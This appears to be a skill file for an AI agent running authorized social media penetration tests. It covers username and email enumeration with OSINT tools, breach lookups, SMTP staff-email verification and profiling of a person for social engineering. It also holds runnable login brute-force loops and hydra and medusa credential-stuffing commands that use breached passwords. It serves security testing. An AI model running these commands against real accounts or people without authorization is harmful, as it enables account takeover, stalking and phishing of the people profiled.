| name | pentest-social-media |
| description | Social media OSINT, username enumeration across 400-2500+ platforms, email-to-account mapping, account security testing, OAuth/SSO weakness analysis, and social engineering recon for authorized engagements. |
| triggers | ["social media","Instagram","Facebook","LinkedIn","Twitter","TikTok","username","account discovery","sherlock","maigret","holehe","social OSINT","email to account","find accounts","find social","profile enumeration","account takeover","credential stuffing"] |
Social Media Penetration Testing Skill
Platform Coverage
| Tool | Sites | Best For |
|---|
| sherlock | 400+ | Username across all major social platforms |
| maigret | 2500+ | Deepest username coverage available |
| holehe | 200+ | Email address → linked social accounts |
| social-analyzer | 300+ | Dynamic profiling + risk scoring |
| theharvester | Various | Email + social from domain/company OSINT |
Phase 1 — OSINT Reconnaissance
Install Tools
pip3 install sherlock-project maigret holehe social-analyzer
apt-get install -y theharvester
Username Enumeration
sherlock <username> --timeout 10 --output /root/kali-workspace/sherlock-<username>.json
sherlock <user1> <user2> <user3>
maigret <username> --json /root/kali-workspace/maigret-<username>.json --timeout 15
maigret <username> --site instagram,linkedin,twitter,github,reddit
social-analyzer --username <username> --mode fast \
--output /root/kali-workspace/social-<username>.json
for user in <base> <base>_ <base>123 <base>official <base>real; do
sherlock "$user" --timeout 10 >> /root/kali-workspace/sherlock-all.txt
done
Email → Account Mapping
holehe <target@email.com> | tee /root/kali-workspace/holehe-<email>.txt
while IFS= read -r email; do
echo "=== $email ===" >> /root/kali-workspace/holehe-all.txt
holehe "$email" >> /root/kali-workspace/holehe-all.txt 2>&1
done < /root/kali-workspace/emails.txt
theHarvester -d <target_domain> -b all -f /root/kali-workspace/harvest
Breach Intelligence
curl -s -H "hibp-api-key: <YOUR_KEY>" \
"https://haveibeenpwned.com/api/v3/breachedaccount/<email>" | python3 -m json.tool
trufflehog git https://github.com/<org>/<repo> --only-verified
Phase 2 — Account Security Testing
Auth Weakness Testing
for i in $(seq 1 20); do
STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
-X POST https://<target>/login \
-d "email=victim@email.com&password=wrong$i")
echo "Attempt $i: HTTP $STATUS"
sleep 0.3
done
curl -s -X POST https://<target>/reset -d "email=exists@target.com" | head -5
curl -s -X POST https://<target>/reset -d "email=nosuchuser@target.com" | head -5
OAuth & SSO Testing
ffuf -u https://<target>/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-mc 200,301,302 -fc 404 -t 50
Credential Stuffing
hydra -f -L /root/kali-workspace/breach-emails.txt \
-P /root/kali-workspace/breach-passwords.txt \
https-post-form://<target>/login:email=^USER^&password=^PASS^:Invalid -t 4
medusa -h <target> -U emails.txt -P passwords.txt \
-M http-post-form -t 4 -f \
-m "FORM:/login:email=^USER^&password=^PASS^:Invalid credentials"
hydra -f -L users.txt -p "Password123!" \
https-post-form://<api>/v1/login:username=^USER^&password=^PASS^:error -t 4
Phase 3 — Social Engineering Recon
Full Target Profile Pipeline
TARGET_USER="johndoe"
TARGET_EMAIL="john.doe@company.com"
TARGET_DOMAIN="company.com"
sherlock $TARGET_USER --output /root/kali-workspace/sherlock-$TARGET_USER.json
holehe $TARGET_EMAIL | tee /root/kali-workspace/holehe-$TARGET_USER.txt
theHarvester -d $TARGET_DOMAIN -b all -f /root/kali-workspace/harvest-$TARGET_DOMAIN
maigret $TARGET_USER --json /root/kali-workspace/maigret-$TARGET_USER.json
echo "# Social Profile: $TARGET_USER" > /root/kali-workspace/profile-$TARGET_USER.md
echo "Email: $TARGET_EMAIL" >> /root/kali-workspace/profile-$TARGET_USER.md
echo "Accounts found: see sherlock + maigret output" >> /root/kali-workspace/profile-$TARGET_USER.md
Staff Email Enumeration (LinkedIn → SMTP Verify)
theHarvester -d <company.com> -b linkedin,google,bing -f /root/kali-workspace/staff
python3 -c "
names = ['John Smith', 'Jane Doe', 'Bob Jones']
domain = 'company.com'
for name in names:
f, l = name.lower().split()
print(f'{f}.{l}@{domain}')
print(f'{f[0]}{l}@{domain}')
print(f'{f}@{domain}')
" > /root/kali-workspace/generated-emails.txt
smtp-user-enum -M RCPT -U /root/kali-workspace/generated-emails.txt \
-D <domain> -t <smtp_server> -o /root/kali-workspace/valid-emails.txt
Phase 4 — Reporting Template
# Social Media OSINT Report — <Target>
## 1. Exposed Accounts
| Platform | URL | Username | Profile Visibility |
| --------- | ------------------------------ | --------- | -------------------------------- |
| Instagram | https://instagram.com/<user> | @target | Public — full post history |
| LinkedIn | https://linkedin.com/in/<user> | Full name | Public — job history, colleagues |
## 2. Email → Account Mapping (holehe)
- target@company.com registered on: Instagram ✓, Spotify ✓, Adobe ✓, Dropbox ✓
## 3. Harvested Email Addresses
| Email | Source | SMTP Verified |
| ---------------- | -------- | ------------- |
| john@company.com | LinkedIn | Valid |
| jane@company.com | Google | Valid |
## 4. Breach Exposure
- Email found in X breaches (source: HIBP)
- Breached passwords available for credential stuffing
## 5. Attack Surface
- Social engineering risk: HIGH — full profile public, personal details exposed
- Credential stuffing risk: MEDIUM — email in known breach databases
- Account takeover: MEDIUM — no 2FA on password reset flow detected
## 6. Recommendations
- Enable 2FA on all social accounts (app-based, not SMS)
- Use unique usernames per platform to prevent cross-correlation
- Rotate passwords exposed in breaches immediately
- Implement rate limiting on login + password reset endpoints
ATT&CK Mapping
| Technique | ID | Tool |
|---|
| Gather Victim Identity Info | T1589 | sherlock, maigret |
| Email Addresses | T1589.002 | theharvester, holehe |
| Social Media | T1593.001 | sherlock, social-analyzer |
| Credential Stuffing | T1110.004 | hydra, medusa |
| Valid Accounts | T1078 | Found credentials |
| Phishing | T1566 | Social graph for targeting |